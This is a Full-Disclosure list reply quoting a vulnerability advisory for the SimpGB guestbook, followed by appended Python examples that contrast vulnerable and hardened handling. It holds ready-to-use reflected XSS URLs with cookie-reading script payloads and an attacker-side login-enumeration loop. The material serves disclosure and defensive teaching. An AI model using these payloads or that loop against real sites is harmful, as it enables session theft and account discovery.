Send your shitty stuff to bugt...@securityfocus.com. If it's not obvious, no one gives a shit here, seriously.
2011/1/27 MustLive <mustl...@websecurity.com.ua>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> SimpGB v1.49.02 and previous versions are vulnerable.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in the Preview function. If a captcha is used in the
> guestbook, then a valid captcha code is required for the attack. Or
> via GET request:
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
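Worked example for the XSS part of the quoted advisory. This is added code, not SimpGB's guestbook.php and not MustLive's: the preview template, the helper names and the assumption that postingid and location are echoed inside a double-quoted attribute while poster is echoed as text are all illustrative. What it shows is why the advisory's three GET URLs look the way they do (the postingid and location payloads start with %22%3E, a `">` that closes the attribute and the tag before the script tag can be parsed) and how escaping each field for its HTML context stops all three.

```python
"""Reflected XSS in a guestbook 'preview' handler: assumed vulnerable rendering
beside a hardened one, exercised with the GET URLs quoted in the advisory.

Added example, not SimpGB's code. The template and parameter placement are
assumptions for illustration."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed: the three GET URLs from the advisory ("site" is its placeholder host).
ADVISORY_URLS = [
    "http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview",
    "http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview",
    "http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview",
]
PAYLOAD = "<script>alert(document.cookie)</script>"


def params_from_url(url):
    """Decode the query string roughly as PHP's $_GET would (first value wins)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def render_preview_vulnerable(p):
    """Assumed vulnerable preview: user fields are dropped straight into HTML.
    poster lands in text context; postingid and location land inside a
    double-quoted attribute value, so a bare <script> there is just attribute
    text and needs a leading '">' to break out first."""
    return (
        f'<input type="hidden" name="postingid" value="{p.get("postingid", "")}">\n'
        f'<p class="poster">{p.get("poster", "")}</p>\n'
        f'<input type="text" name="location" value="{p.get("location", "")}">\n'
        f'<div class="text">{p.get("input_text", "")}</div>'
    )


def render_preview_hardened(p):
    """Same template; every field escaped with quote=True so '"' becomes &quot;
    and cannot terminate the attribute, and '<' becomes &lt; in text context."""
    def e(key):
        return html.escape(p.get(key, ""), quote=True)
    return (
        f'<input type="hidden" name="postingid" value="{e("postingid")}">\n'
        f'<p class="poster">{e("poster")}</p>\n'
        f'<input type="text" name="location" value="{e("location")}">\n'
        f'<div class="text">{e("input_text")}</div>'
    )


class ScriptTagFinder(HTMLParser):
    """Records whether the markup parses to a real <script> start tag, rather
    than just containing the characters '<script>' inside an attribute value."""
    def __init__(self):
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found = True


def script_tag_parsed(markup):
    """True if a browser-like parse would see a script element. Only covers
    this payload shape; event-handler attributes etc. are not checked."""
    parser = ScriptTagFinder()
    parser.feed(markup)
    parser.close()
    return parser.found


def assess(url):
    """Outcome of one advisory URL against both renderers."""
    p = params_from_url(url)
    return {
        "vulnerable": script_tag_parsed(render_preview_vulnerable(p)),
        "hardened": script_tag_parsed(render_preview_hardened(p)),
    }


if __name__ == "__main__":
    for u in ADVISORY_URLS:
        print(assess(u))
    # A bare payload in postingid stays trapped inside the attribute value:
    print(script_tag_parsed(render_preview_vulnerable({"postingid": PAYLOAD})))
```

The parser-based check is deliberately used instead of a substring match: a substring match would also flag the bare payload that never leaves the attribute value, which is exactly the distinction the `%22%3E` prefix in the advisory's second and third URLs exists to make.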
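Worked example for the Insufficient Anti-automation and Abuse of Functionality items the advisory reports against admin/pwlost.php. This is added code, not SimpGB's pwlost.php and not from the poster: the account table, the messages and the limits are assumptions for illustration. It shows a reset handler whose reply differs for known and unknown logins (which is what lets an automated client retrieve logins), the attacker-side loop that exploits that difference, and a version that answers identically for every login and throttles per client address; the same limiter, keyed on client address, is what you would put in front of the admin login the advisory lists under Brute Force.

```python
"""Password-reset endpoint that leaks which logins exist, beside a version that
replies identically for every login and throttles requests per client address.

Added example, not SimpGB's code. Users, messages and limits are assumed."""
from collections import defaultdict, deque

# Constructed sample account table: login -> e-mail address.
USERS = {"admin": "admin@example.invalid", "editor": "editor@example.invalid"}


def leaky_reset(login):
    """Distinct replies reveal whether a login exists: the enumeration problem."""
    if login not in USERS:
        return "Unknown login."
    return f"A new password has been sent to {USERS[login]}."


class ThrottledReset:
    """Generic reply plus a sliding-window request counter per client address.
    Keyed on the client address alone it also fits a login form such as the
    admin index, to slow password guessing from one source."""

    GENERIC = "If the login exists, a new password has been sent to its e-mail address."
    THROTTLED = "Too many requests; try again later."

    def __init__(self, max_requests=5, window_seconds=3600):
        self.max_requests = max_requests
        self.window = window_seconds
        self._hits = defaultdict(deque)  # client address -> request timestamps
        self.sent = []                   # (login, client) that were actually mailed

    def allowed(self, client, now):
        """Drop timestamps older than the window, then admit if under the cap."""
        q = self._hits[client]
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.max_requests:
            return False
        q.append(now)
        return True

    def reset(self, login, client, now):
        """Identical wording whether or not the login exists; the only branch
        that depends on the login is the side effect of sending mail."""
        if not self.allowed(client, now):
            return self.THROTTLED
        if login in USERS:
            self.sent.append((login, client))  # mail would be sent here
        return self.GENERIC


def enumerate_logins(reply_fn, candidates):
    """Attacker side: keep every candidate whose reply differs from the reply
    for a login that certainly does not exist."""
    baseline = reply_fn("no-such-login-zz")
    return [c for c in candidates if reply_fn(c) != baseline]


if __name__ == "__main__":
    print(enumerate_logins(leaky_reset, ["admin", "editor", "guest"]))
    svc = ThrottledReset()
    print(enumerate_logins(lambda l: svc.reset(l, "198.51.100.7", 1000),
                           ["admin", "editor", "guest"]))
```

A uniform message is necessary but not sufficient: if sending mail takes measurably longer than not sending it, the response time still tells known and unknown logins apart, so the mail should be queued rather than sent inline. A captcha, as the advisory asks for, addresses the automation; the uniform reply addresses the login disclosure, and the two are independent fixes.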